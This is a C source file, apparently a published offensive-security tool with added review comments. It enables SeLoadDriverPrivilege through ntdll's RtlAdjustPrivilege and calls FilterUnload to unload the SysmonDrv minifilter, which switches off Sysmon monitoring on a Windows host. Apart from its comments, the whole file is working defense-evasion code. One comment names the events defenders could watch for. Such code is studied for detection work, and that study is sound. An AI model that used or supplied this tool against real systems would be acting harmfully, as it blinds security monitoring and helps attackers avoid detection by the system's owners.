#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter.
It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
In this code we are unloading the "SysmonDrv" minifilter.
You need administrative privs to escalate to SeLoadDriverPrivilege.
*/
/* Function-pointer type for the undocumented ntdll export RtlAdjustPrivilege,
 * which is resolved at run time with GetProcAddress further down (there is no
 * import-library declaration for it). Parameters as used in this file: the
 * privilege constant, an enable/disable flag, whether to act on the current
 * thread's token rather than the process token, and an out-parameter
 * (`Enabled`) the callee writes to. */
typedef NTSTATUS(WINAPI *_RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled);
/*
 * Program entry point. Enables SeLoadDriverPrivilege on the process token via
 * ntdll!RtlAdjustPrivilege, then asks Filter Manager to unload the minifilter
 * named in `driver` and prints a one-line result. argc/argv are unused; the
 * exit code is always 0, so callers cannot tell success from failure except
 * by reading stdout.
 *
 * From a defender's standpoint: a successful FilterUnload removes the named
 * minifilter from the I/O stack, so the privilege it depends on
 * (SeLoadDriverPrivilege, available to elevated administrators) and the
 * unload of this filter are the events worth monitoring.
 */
int _tmain(int argc, _TCHAR* argv[]) {
ULONG t;                         /* out-parameter filled in by RtlAdjustPrivilege; never read */
HRESULT unload;                  /* result of FilterUnload */
LPCWSTR driver = L"SysmonDrv";   /* minifilter name as registered with Filter Manager */
/* NOTE(review): neither GetModuleHandle nor GetProcAddress is checked; a NULL
 * result here is called through on the next line and crashes the process. */
_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
/* 012 is an OCTAL literal, i.e. decimal 10 == SE_LOAD_DRIVER_PRIVILEGE.
 * The returned NTSTATUS is discarded, so a failure to enable the privilege
 * (not held, or the process is not elevated) only surfaces indirectly when
 * FilterUnload fails below. */
RtlAdjustPrivilege(012, TRUE, FALSE, &t);
/* Win32 wrapper over FltUnloadFilter (see header comment); per that comment
 * the target filter's FilterUnloadCallback runs as part of this call. */
unload = FilterUnload(driver);
/* Any HRESULT other than S_OK is reported with the same generic message;
 * the actual error code is not printed. */
wprintf(L"%ls", unload == S_OK ?
L"Minifilter Successfully Unloaded" :
L"An Error Occured. Check Privs."
);
return 0;
}